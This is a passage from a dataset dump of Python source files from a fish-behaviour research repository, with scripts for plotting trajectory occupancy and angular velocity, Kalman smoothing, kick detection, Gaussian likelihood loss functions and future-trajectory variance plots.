grid = {'x': x, 'y': y, 'z': z}\n        grids[k] = grid\n\n        fig = plt.figure(figsize=(6, 5))\n        ax = plt.gca()\n        ax, _ = occupancy_grid(data, grid, fig, k, ax, args, pad=0.13)\n        plt.grid(linestyle='dotted')\n        plt.tight_layout()\n        plt.savefig(path + '/occupancy_{}.png'.format(k), bbox_inches='tight')\n        plt.close()\n\n    # the difference plots below need all three types to be available\n    if 'Real' not in grids.keys() or 'Hybrid' not in grids.keys() or 'Virtual' not in grids.keys():\n        import warnings\n        warnings.warn('Skipping grid difference plots')\n        return\n    else:\n        fig = plt.figure(figsize=(6, 5))\n        ax = plt.gca()\n        ax, _ = grid_difference(\n            grids, 'Real', 'Virtual', fig, ax, args, pad=0.135)\n        plt.tight_layout()\n        plt.savefig(\n            path + '/occupancy_diff_{}-{}.png'.format('Real', 'Virtual'), bbox_inches='tight')\n        plt.close()\n\n        fig = plt.figure(figsize=(6, 5))\n        ax = plt.gca()\n        ax, _ = grid_difference(\n            grids, 'Real', 'Hybrid', fig, ax, args, pad=0.135)\n        plt.tight_layout()\n        plt.savefig(path + '/occupancy_diff_{}-{}.png'.format('Real',\n                                                              'Hybrid'), bbox_inches='tight')\n        plt.close()\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\n        description='Visualize the positions')\n    parser.add_argument('--positions', '-p', type=str,\n                        help='Path to the trajectory file',\n                        required=True)\n    parser.add_argument('--type',\n                        nargs='+',\n                        default=['Real', 'Hybrid', 'Virtual'],\n                        choices=['Real', 'Hybrid', 'Virtual'])\n    parser.add_argument('--original_files',\n                        type=str,\n                        default='raw/*processed_positions.dat',\n                        required=False)\n    parser.add_argument('--hybrid_files',\n                        type=str,\n                        default='generated/*generated_positions.dat',\n                        required=False)\n    parser.add_argument('--virtual_files',\n                        type=str,\n                        default='generated/*generated_virtu_positions.dat',\n                        required=False)\n    parser.add_argument('--radius',\n                        type=float,\n                        help='Radius',\n                        default=0.25,\n                        required=False)\n    parser.add_argument('--grid_bins',\n                        type=int,\n                        help='Number of bins for the occupancy grid plot',\n                        default=208,\n                        required=False)\n    parser.add_argument('--center',\n                        type=float,\n                        nargs='+',\n                        help='The centroidal coordinates for the setups used',\n                        default=[0.0, 0.0],\n                        required=False)\n    parser.add_argument('--grid_smooth',\n                        action='store_true',\n                        help='Smooth the grid for visual reasons if true',\n                        default=False,\n                        required=False)\n    parser.add_argument('--grid_cutoff_thres',\n                        type=float,\n                        help='Cutoff point threshold for the percentage of points that are allowed to be removed to not squash the grid drawing colours',\n                        default=0.05,\n                        required=False)\n    parser.add_argument('--grid_cutoff_val',\n                        type=float,\n                        help='Force the cutoff value of the grid for consistency (overrides 
grid_cutoff_thres)',\n default=-1,\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.4967551529407501,
"alphanum_fraction": 0.5038347840309143,
"avg_line_length": 35.45161437988281,
"blob_id": "d78ecc494676889a81db4fbb2e33bd93765ac566",
"content_id": "83adb4035f8b3ce69be4ff2975b606a4ba10ec05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3390,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 93,
"path": "/find/plots/spatial/angular_velocity.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.plots.common import *\nfrom find.utils.features import Velocities\nfrom find.utils.utils import angle_to_pipi\n\n\ndef plot(exp_files, path, args):\n ccycler = uni_cycler()\n linecycler = uni_linecycler()\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = []\n for p in pos:\n matrix = np.loadtxt(p) * args.radius\n matrix = Velocities([matrix], args.timestep).get()[0]\n for i in range(matrix.shape[1] // 2):\n angles = np.arctan2(matrix[:, i * 2 + 1], matrix[:, i * 2])\n data[e].append(angles)\n\n labels = []\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n for i, k in enumerate(sorted(data.keys())):\n vectors = data[k]\n labels.append(k)\n cvector = []\n for v in vectors:\n phis = v[1:]\n phis_tm1 = v[:-1]\n phis = list(map(angle_to_pipi, phis - phis_tm1))\n cvector += phis\n cvector = list(map(lambda x: x * 180 / np.pi, cvector))\n sns.kdeplot(cvector, ax=ax,\n color=next(ccycler), linestyle=next(linecycler), linewidth=uni_linewidth, label=k, gridsize=args.kde_gridsize)\n\n ax.set_xlabel('Angular change between successive timesteps (degrees)')\n ax.set_ylabel('PDF')\n ax.legend()\n plt.savefig(path + 'angular_velocity.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Angular velocity histogram figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--timestep', '-t', type=float,\n help='Timestep',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--kde_gridsize',\n type=int,\n help='Grid size for kernel density estimation plots',\n default=1500,\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.5587378740310669,
"alphanum_fraction": 0.563592255115509,
"avg_line_length": 35.140350341796875,
"blob_id": "6f477f8be689580a49549d1361b903edd0073d58",
"content_id": "f234bcadd7c95afa9a71e35c047700d54d9bc0fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2060,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 57,
"path": "/find/smoothing/kf_smooth.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport argparse\nimport glob\nimport numpy as np\nfrom pykalman import KalmanFilter\n\nfrom find.utils.features import Velocities\nfrom find.utils.utils import ExperimentInfo, Center, Normalize\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Smoothing for the fish trajectories')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--fps', type=int,\n help='Camera framerate',\n required=True)\n parser.add_argument('--centroids', '-c', type=int,\n help='Frames to use in order to compute the centroidal positions',\n required=True)\n parser.add_argument('--center', action='store_true',\n help='Center smoothed data')\n parser.add_argument('--norm', action='store_true',\n help='Normalize smoothed data')\n args = parser.parse_args()\n\n timestep = args.centroids / args.fps\n\n files = glob.glob(args.path + '/*processed_positions.dat')\n data = []\n for f in files:\n positions = np.loadtxt(f)\n\n mus = []\n for i in range(positions.shape[1] // 2):\n kf = KalmanFilter(n_dim_state=2, n_dim_obs=2)\n mu, sigma = kf.filter(positions[:, i * 2:i * 2 + 2])\n if len(mus) == 0:\n mus = np.array(mu)\n else:\n mus = np.append(mus, np.array(mu))\n data.append(mus)\n\n info = ExperimentInfo(data)\n if args.center:\n data, info = Center(data, info).get()\n if args.norm:\n data, info = Normalize(data, info).get()\n velocities = Velocities(data, timestep).get()\n\n for i in range(len(data)):\n f = files[i]\n new_f = f.replace('positions.dat', 'positions_filtered.dat', 1)\n np.savetxt(new_f, data[i])\n new_f = f.replace('positions.dat', 'velocities_filtered.dat', 1)\n np.savetxt(new_f, velocities[i])\n"
},
{
"alpha_fraction": 0.595174252986908,
"alphanum_fraction": 0.6066641211509705,
"avg_line_length": 43.25423812866211,
"blob_id": "4c5bf1683e51b52cf17ad3694beea74fa51d40b9",
"content_id": "736ee7ee3494a21f9e9eb6e4945309123395e79e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2611,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 59,
"path": "/find/utils/detect_kicks.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport argparse\nimport glob\n\nimport numpy as np\nimport scipy.signal as signal\n\n\"\"\"\n:brief: This script will take as input fish trajectory and the corresponding velocities and then detect\n the kicks that the fish performed. We define this kick as the acceleration and deceleration phase \n between to valleys of the signal.\n\"\"\"\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Preprocess fish trajectories')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n args = parser.parse_args()\n\n files = glob.glob(args.path + '/*processed_positions_filtered.dat')\n\n all_features = np.empty(shape=[0, 3])\n for f in files:\n positions = np.loadtxt(f)\n velocities = np.loadtxt(f.replace('positions', 'velocities'))\n\n # we compute the resultant velocities for this 2D problem\n rvelocities = []\n for i in range(velocities.shape[0]):\n r = np.sqrt(velocities[i, 1] ** 2 +\n velocities[i, 0] ** 2 -\n 2 * np.abs(velocities[i, 1]) * np.abs(velocities[i, 0]) * np.cos(\n np.arctan2(velocities[i, 1], velocities[i, 0])))\n rvelocities.append(r)\n rvelocities = np.array(rvelocities)\n\n # the following code detects the valleys of the signal. Our kick is contained between successive valleys !\n valleys = signal.find_peaks_cwt(1 / rvelocities, np.arange(0.1, 0.3))\n\n # we go on to store the features of this analysis in a matrix that can be used later for analysis\n events = []\n features = []\n for i in range(len(valleys) - 1):\n event = [i, np.argmax(rvelocities[valleys[i]:valleys[i + 1] + 1]), valleys[i], valleys[i + 1]]\n events.append(event)\n\n peak_vel = rvelocities[event[1]]\n length = valleys[i + 1] - valleys[i] + 1\n mean = np.mean(rvelocities[valleys[i]:valleys[i + 1] + 1])\n features.append([peak_vel, length, mean])\n all_features = np.append(all_features, np.array(features), axis=0)\n np.savetxt(f.replace('positions', 'kicks'), events)\n np.savetxt(f.replace('positions', 'kicks_features'), features)\n\n np.savetxt(args.path + '/all_kick_features.dat', all_features)\n for n in range(all_features.shape[1]):\n all_features[:, n] = (all_features[:, n] - np.mean(all_features[:, n])) / np.std(all_features[:, n])\n np.savetxt(args.path + '/standardized_kick_features.dat', all_features)\n"
},
{
"alpha_fraction": 0.5957246422767639,
"alphanum_fraction": 0.6133291125297546,
"avg_line_length": 32.84042739868164,
"blob_id": "eac86123dcf7bf30e218cb3c15a750d311eb103b",
"content_id": "08d0696fb1ea57df835d04e532213247412f5bea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3181,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 94,
"path": "/find/models/tf_losses.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport tensorflow.keras.backend as K\n\n\ndef logbound(val, max_logvar=0.5, min_logvar=-10, backend=None):\n if backend is None:\n logsigma = max_logvar - np.log(np.exp(max_logvar - val) + 1)\n logsigma = min_logvar + np.log(np.exp(logsigma - min_logvar) + 1)\n elif backend == 'keras':\n logsigma = max_logvar - K.log(K.exp(max_logvar - val) + 1)\n logsigma = min_logvar + K.log(K.exp(logsigma - min_logvar) + 1)\n return logsigma\n\n\ndef gaussian_nll(y_true, y_pred):\n \"\"\"\n :brief: Gaussian negative log likelihood loss function for probabilistic network outputs.\n\n :param y_true: np.array of the values the network needs to predict\n :param y_pred: np.array of the values the network predicted\n :return: float\n \"\"\"\n\n n_dims = int(int(y_pred.shape[1]) / 2)\n mu = y_pred[:, :n_dims]\n logsigma = logbound(y_pred[:, n_dims:], 0, -10, backend='keras')\n \n mse = -0.5 * K.sum(K.square((y_true-mu) / K.exp(logsigma)), axis=1)\n sigma_trace = -K.sum(logsigma, axis=1)\n log2pi = -0.5 * n_dims * np.log(2 * np.pi)\n log_likelihood = mse + sigma_trace + log2pi\n return K.mean(-log_likelihood)\n\ndef multi_dim_gaussian_nll(y_true, y_pred):\n \"\"\"\n :brief: Gaussian negative log likelihood loss function for probabilistic network outputs.\n\n :param y_true: np.array of the values the network needs to predict\n :param y_pred: np.array of the values the network predicted\n :return: float\n \"\"\"\n\n means = []\n prediction_steps = y_pred.shape[2]\n for i in range(prediction_steps):\n n_dims = y_pred.shape[3] // 2\n mu = y_pred[:, 0, i, :n_dims]\n logsigma = logbound(y_pred[:, 0, i, n_dims:],\n 0.5, -10, backend='keras')\n\n # https://www.cs.cmu.edu/~epxing/Class/10701-08s/recitation/gaussian.pdf\n f = -0.5 * \\\n K.sum(K.square((y_true[:, 0, i, :] - mu) /\n (K.exp(logsigma) + 1e-8)), axis=1)\n sigma_trace = -K.sum(logsigma, axis=1)\n log2pi = -0.5 * n_dims * np.log(2 * np.pi)\n log_likelihood = f + sigma_trace + log2pi\n means.append(K.mean(-log_likelihood))\n\n return sum(means) / len(means)\n\n\ndef gaussian_mae(y_true, y_pred):\n \"\"\"\n :brief: Custom mean absolute error function for the Gaussian negative log likelihood function.\n\n :param y_true: np.array of the values the network needs to predict\n :param y_pred: np.array of the values the network predicted\n :return: float\n \"\"\"\n\n n_dims = y_pred.shape[1] // 2\n return K.mean(K.abs(y_pred[:, :n_dims] - y_true), axis=-1)\n\n\ndef gaussian_mse(y_true, y_pred):\n \"\"\"\n :brief: Custom mean squared error function for the Gaussian negative log likelihood function.\n\n :param y_true: np.array of the values the network needs to\n :param y_pred: np.array of the values the network predicted\n :return: float\n \"\"\"\n\n n_dims = y_pred.shape[1] // 2\n return K.mean(K.square(y_pred[:, :n_dims] - y_true), axis=-1)\n\n\nlosses = {\n 'gaussian_nll': gaussian_nll,\n 'gaussian_mse': gaussian_mse,\n 'gaussian_mae': gaussian_mae,\n 'multi_dim_gaussian_nll': multi_dim_gaussian_nll,\n}\n"
},
{
"alpha_fraction": 0.4070471227169037,
"alphanum_fraction": 0.42692455649375916,
"avg_line_length": 40.05345916748047,
"blob_id": "68d26e57c9346c715933c637b33940384052b2de",
"content_id": "3e3044514fa391957f86af8216c6ce004fc19209",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26110,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 636,
"path": "/find/plots/spatial/future_trajectory_variance.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport os\nimport glob\nimport argparse\n\nfrom numpy.lib.function_base import angle\nfrom find.plots.spatial.relative_orientation import viewing_angle\n\nfrom find.utils.utils import angle_to_pipi\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\n\nimport matplotlib\nfrom scipy.interpolate import griddata\nimport scipy.stats as st\n\n\ndef gen_arrow_head_marker(angle):\n arr = np.array([[.1, .3], [.1, -.3], [1, 0]]) # arrow shape\n rot_mat = np.array([\n [np.cos(angle), np.sin(angle)],\n [-np.sin(angle), np.cos(angle)]\n ])\n arr = np.matmul(arr, rot_mat) # rotates the arrow\n x0 = np.amin(arr[:, 0])\n x1 = np.amax(arr[:, 0])\n y0 = np.amin(arr[:, 1])\n y1 = np.amax(arr[:, 1])\n scale = np.amax(np.abs([x0, x1, y0, y1]))\n arrow_head_marker = mpl.path.Path(arr)\n return arrow_head_marker, scale\n\n\ndef create_dirs(fullpath):\n if not os.path.exists(fullpath):\n os.makedirs(fullpath)\n\n\ndef compute_grid(data, args):\n grid = {}\n for k in sorted(data.keys()):\n grid[k] = {}\n skipped_count = 0\n total_count = 0\n\n trajectory_segments = []\n segment_len = args.observation_len + \\\n args.prediction_len + 1 # +1 for the starting point\n\n # generate grids\n r_grid = np.arange(0, args.radius + 0.001, args.radius_grid_res)\n idx_dict = {}\n for i in range(1, len(r_grid)):\n idx_dict[(r_grid[i-1], r_grid[i])] = {}\n idx_dict[(r_grid[i-1], r_grid[i])]['all'] = []\n\n a_grid = np.arange(0, 180 + 0.001, args.angle_grid_res)\n idist_grid = np.arange(0, args.radius + 0.001, args.interdist_grid_res)\n psi_grid = np.arange(0, 180 + 0.001, args.viewing_angle_grid_res)\n\n for e in range(len(data[k]['pos'])):\n p = data[k]['pos'][e]\n v = data[k]['vel'][e]\n idist = data[k]['dist'][e]\n dwall = data[k]['dist_to_wall'][e]\n\n total_count += 1\n if segment_len > p.shape[0]:\n skipped_count += 1\n continue # not enough samples to generate the plot\n\n # headings\n hdgs = np.empty((p.shape[0], 0))\n for i in range(p.shape[1] // 2):\n hdg = np.arctan2(v[:, i*2+1], v[:, i*2])\n hdgs = np.hstack((hdgs, hdg.reshape(-1, 1)))\n\n # angles to the wall\n angles_to_wall = np.empty((hdgs.shape[0], hdgs.shape[1]))\n for i in range(angles_to_wall.shape[1]):\n aw = hdgs[:, i] - \\\n np.arctan2(p[:, i*2+1], p[:, i*2])\n angles_to_wall[:, i] = list(map(angle_to_pipi, aw))\n\n # viewing angles\n angle_dif_focal = hdgs[:, 0] - \\\n np.arctan2(p[:, 3] - p[:, 1], p[:, 2] - p[:, 0])\n angle_dif_focal = list(map(angle_to_pipi, angle_dif_focal))\n\n angle_dif_neigh = hdgs[:, 1] - \\\n np.arctan2(p[:, 1] - p[:, 3], p[:, 0] - p[:, 2])\n angle_dif_neigh = list(map(angle_to_pipi, angle_dif_neigh))\n\n viewing_angles = np.array([angle_dif_focal, angle_dif_neigh]).T\n\n # complete matrix with info about the trajectories of the neighbouring fish\n matrix = np.hstack((p, v, angles_to_wall, dwall,\n idist.reshape(-1, 1), viewing_angles, hdgs))\n for i in range(matrix.shape[0]):\n if i + segment_len >= matrix.shape[0]:\n break\n\n # X1 Y1 X2 Y2 VX1 VY1 VX2 VY2 Th1 Th2 D1 D2 Idist Psi1 Psi2 Hdg1 Hdg2\n # 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16\n trajectory_segments.append(matrix[i:(i+segment_len), :])\n\n # --- generate grids\n\n # radii grid\n for ts_idx, ts in enumerate(trajectory_segments):\n for i in range(1, len(r_grid)):\n if r_grid[i-1] <= ts[args.observation_len, 10] and ts[args.observation_len, 10] < r_grid[i]:\n idx_dict[(r_grid[i-1], r_grid[i])\n ]['all'].append((ts_idx, 0))\n if r_grid[i-1] <= ts[args.observation_len, 11] and ts[args.observation_len, 11] < 
r_grid[i]:\n idx_dict[(r_grid[i-1], r_grid[i])\n ]['all'].append((ts_idx, 1))\n\n # radii and angle to the wall\n for dgrid, sub_dict in idx_dict.items():\n for idx in sub_dict['all']:\n for i in range(1, len(a_grid)):\n ts = trajectory_segments[idx[0]]\n\n if (a_grid[i-1], a_grid[i]) not in sub_dict.keys():\n idx_dict[dgrid][(a_grid[i-1], a_grid[i])] = {}\n # ! this could be moved to not create empty lists if there are no idcs in it\n idx_dict[dgrid][(a_grid[i-1], a_grid[i])]['all'] = []\n\n if a_grid[i-1] <= np.abs(ts[args.observation_len, 8 + idx[1]] * 180 / np.pi) and np.abs(ts[args.observation_len, 8 + idx[1]] * 180 / np.pi) < a_grid[i]:\n idx_dict[dgrid][(a_grid[i-1], a_grid[i])\n ]['all'].append(idx)\n\n # interindividual distance grid\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n for agrid, sub_dict2 in sub_dict1.items():\n if agrid == 'all':\n continue\n\n for idx in sub_dict2['all']:\n for i in range(1, len(idist_grid)):\n ts = trajectory_segments[idx[0]]\n\n if (idist_grid[i-1], idist_grid[i]) not in sub_dict2.keys():\n idx_dict[dgrid][agrid][(\n idist_grid[i-1], idist_grid[i])] = {}\n # ! this could be moved to not create empty lists if there are no idcs in it\n idx_dict[dgrid][agrid][(\n idist_grid[i-1], idist_grid[i])]['all'] = []\n\n if idist_grid[i-1] <= ts[args.observation_len, 12] and ts[args.observation_len, 12] < idist_grid[i]:\n idx_dict[dgrid][agrid][(\n idist_grid[i-1], idist_grid[i])]['all'].append(idx)\n\n # viewing angle grid\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n for agrid, sub_dict2 in sub_dict1.items():\n if agrid == 'all':\n continue\n\n for idist_grid, sub_dict3 in sub_dict2.items():\n if idist_grid == 'all':\n continue\n\n for idx in sub_dict3['all']:\n for i in range(1, len(psi_grid)):\n ts = trajectory_segments[idx[0]]\n\n focal = idx[1]\n if focal == 0:\n neigh = 1\n va_idx = 14 # we want the viewing angle of the neighbour to the focal\n else:\n neigh = 0\n va_idx = 13\n\n if (psi_grid[i-1], psi_grid[i]) not in sub_dict3.keys():\n idx_dict[dgrid][agrid][idist_grid][(\n psi_grid[i-1], psi_grid[i])] = {}\n # ! 
this could be moved to not create empty lists if there are no idcs in it\n idx_dict[dgrid][agrid][idist_grid][(\n psi_grid[i-1], psi_grid[i])]['all'] = []\n\n if psi_grid[i-1] <= ts[args.observation_len, va_idx] * 180 / np.pi and ts[args.observation_len, va_idx] * 180 / np.pi < psi_grid[i]:\n idx_dict[dgrid][agrid][idist_grid][(\n psi_grid[i-1], psi_grid[i])]['all'].append(idx)\n\n grid[k]['idx_grid'] = idx_dict\n grid[k]['seg'] = trajectory_segments\n print('{} skipped: {} / {} experiment files'.format(k,\n skipped_count, total_count))\n return grid\n\n\ndef plot_future_trajectory_variance(cell_segments, path, type, ax, args):\n if len(cell_segments) == 0:\n return\n\n distributions = {}\n\n xy = np.empty((0, 2))\n for i in range(len(cell_segments)):\n xy = np.vstack([xy, cell_segments[i]])\n\n cmap = matplotlib.cm.get_cmap('jet')\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n xx, yy = np.mgrid[-0.3:0.3:250j, -0.3:0.3:250j]\n kernel = st.gaussian_kde(xy.T)\n grid_pos = np.vstack([xx.ravel(), yy.ravel()])\n f = np.reshape(kernel(grid_pos).T, xx.shape)\n ax.contourf(xx, yy, f, levels=100, cmap=cmap)\n\n np.savetxt(path + '/xx_{}.dat'.format(type), xx)\n np.savetxt(path + '/yy_{}.dat'.format(type), yy)\n np.savetxt(path + '/f_{}.dat'.format(type), f)\n\n outer = plt.Circle(\n (0, 0), 0.25, color='k', fill=False)\n ax.add_artist(outer)\n ax.set_xlim([-0.3, 0.3])\n ax.set_ylim([-0.3, 0.3])\n plt.savefig(path + '/trajectory_variance_type_{}.png'.format(type))\n plt.close()\n\n\ndef plot_grids(data, path, ax, args):\n grid = compute_grid(data, args)\n\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n ccycler = cycle(sns.color_palette(new_palette))\n\n for k in sorted(grid.keys()):\n if k == 'Hybrid':\n lines = [':']\n linecycler = cycle(lines)\n elif k == 'Virtual':\n lines = ['--']\n linecycler = cycle(lines)\n elif k == 'Real':\n lines = ['-']\n linecycler = cycle(lines)\n\n idx_dict = grid[k]['idx_grid']\n segments = grid[k]['seg']\n\n # plot distance barplots\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n cell_range = []\n count = []\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n lb = '{:.3f}'.format(round(dgrid[0], 3))\n ub = '{:.3f}'.format(round(dgrid[1], 3))\n cell_range.append('[{}, {}]'.format(lb, ub))\n count.append(len(sub_dict1['all']))\n\n sns.barplot(x=cell_range, y=count, ax=ax, color=next(ccycler))\n ax.set_xlabel('Radius range (m)')\n ax.set_ylabel('Number of trajectories')\n ax.set_title(k)\n plt.xticks(rotation=45)\n plt.tight_layout()\n plt.savefig(\n path + 'dist_step_{}__type_{}.png'.format(args.radius_grid_res, k))\n plt.close()\n print('Distance plots: done')\n\n # plot angles to the wall barplots\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n cell_range = []\n angles_rad = []\n count = []\n\n for agrid, sub_dict2 in sub_dict1.items():\n if agrid == 'all':\n continue\n\n cell_range.append('[{}, {}]'.format(agrid[0], agrid[1]))\n angles_rad.append(agrid[1] * np.pi / 180.)\n count.append(len(sub_dict2['all']))\n\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n ccycler = cycle(sns.color_palette(new_palette))\n\n ax = plt.subplot(projection='polar')\n ax.set_thetamin(0)\n ax.set_thetamax(180)\n\n if len(count):\n ax.bar(angles_rad, count, width=args.angle_grid_res *\n np.pi / 180., bottom=0.0, color=next(ccycler), alpha=1.0)\n ax.set_xlabel('Radius range (m)')\n ax.set_ylabel('Number of trajectories')\n ax.set_title(k)\n plt.tight_layout()\n\n lb = 
'{:.3f}'.format(round(dgrid[0], 3))\n ub = '{:.3f}'.format(round(dgrid[1], 3))\n dgrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n new_path = path + dgrid_str + '/'\n create_dirs(new_path)\n plt.savefig(\n new_path + 'theta_{}__type_{}.png'.format(dgrid_str, k))\n plt.close()\n print('Angles to wall: done')\n\n # inter individual distance plots\n for dgrid, sub_dict1 in idx_dict.items():\n if dgrid == 'all':\n continue\n\n for agrid, sub_dict2 in sub_dict1.items():\n if agrid == 'all':\n continue\n\n cell_range = []\n count = []\n\n for igrid, sub_dict3 in sub_dict2.items():\n if igrid == 'all':\n continue\n\n cell_range.append('[{:.3f}, {:.3f}]'.format(\n round(igrid[0], 3), round(igrid[1], 3)))\n count.append(len(sub_dict3['all']))\n\n if (len(sub_dict3['all']) > 0):\n ccycler = cycle(sns.color_palette(new_palette))\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n symmetrized_xy = []\n for idx in sub_dict3['all']:\n seg = segments[idx[0]]\n r1 = np.sqrt((seg[:, idx[1]*2] - args.center[0]) ** 2 +\n (seg[:, idx[1]*2 + 1] - args.center[1]) ** 2)\n phi1 = np.arctan2(\n (seg[:, idx[1]*2 + 1] - args.center[1]), (seg[:, idx[1]*2] - args.center[0]))\n\n if (phi1[args.observation_len] < 0):\n phi1 = np.abs(phi1)\n phi1 = phi1 - phi1[0]\n phi1 = np.array(\n list(map(angle_to_pipi, phi1)))\n\n x = r1 * np.cos(phi1)\n y = r1 * np.sin(phi1)\n symmetrized_xy.append(np.array([x, y]).T)\n\n marker, scale = gen_arrow_head_marker(\n angle_to_pipi(seg[args.observation_len, 15 + idx[1]] - phi1[0]))\n\n c = next(ccycler)\n plt.plot(x, y, linestyle=':', color='k')\n plt.plot(x[0], y[0], marker=marker,\n linestyle='None', color='k', markersize=(scale*4)**2)\n plt.plot(x[-1], y[-1], marker='x',\n linestyle='None', color='k')\n\n if (len(sub_dict3['all']) > 0):\n outer = plt.Circle(\n (0, 0), 0.25, color='k', fill=False)\n ax.add_artist(outer)\n\n ax.set_xlim([-0.3, 0.3])\n ax.set_ylim([-0.3, 0.3])\n\n lb = '{:.3f}'.format(round(dgrid[0], 3))\n ub = '{:.3f}'.format(round(dgrid[1], 3))\n dgrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.1f}'.format(round(agrid[0], 1))\n ub = '{:.1f}'.format(round(agrid[1], 1))\n agrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.3f}'.format(round(igrid[0], 3))\n ub = '{:.3f}'.format(round(igrid[1], 3))\n igrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n new_path = path + dgrid_str + '/' + agrid_str + \\\n '/' + igrid_str + '/'\n create_dirs(new_path)\n plt.savefig(\n new_path + 'traj_{}__{}__{}_type_{}.png'.format(dgrid_str, agrid_str, igrid_str, k))\n plt.close()\n\n create_dirs(new_path)\n plot_future_trajectory_variance(\n symmetrized_xy, new_path, k, ax, args)\n\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n ccycler = cycle(sns.color_palette(new_palette))\n\n if len(count):\n sns.barplot(x=cell_range, y=count,\n ax=ax, color=next(ccycler))\n ax.set_xlabel('Interindividual distance (m)')\n ax.set_ylabel('Number of trajectories')\n ax.set_title(k)\n plt.xticks(rotation=45)\n plt.tight_layout()\n\n lb = '{:.3f}'.format(round(dgrid[0], 3))\n ub = '{:.3f}'.format(round(dgrid[1], 3))\n dgrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n lb = '{:.1f}'.format(round(agrid[0], 1))\n ub = '{:.1f}'.format(round(agrid[1], 1))\n agrid_str = '{}-{}'.format(\n lb.replace('.', '_'), ub.replace('.', '_'))\n\n new_path = path + dgrid_str + '/' + agrid_str + '/'\n create_dirs(new_path)\n plt.savefig(\n new_path + 
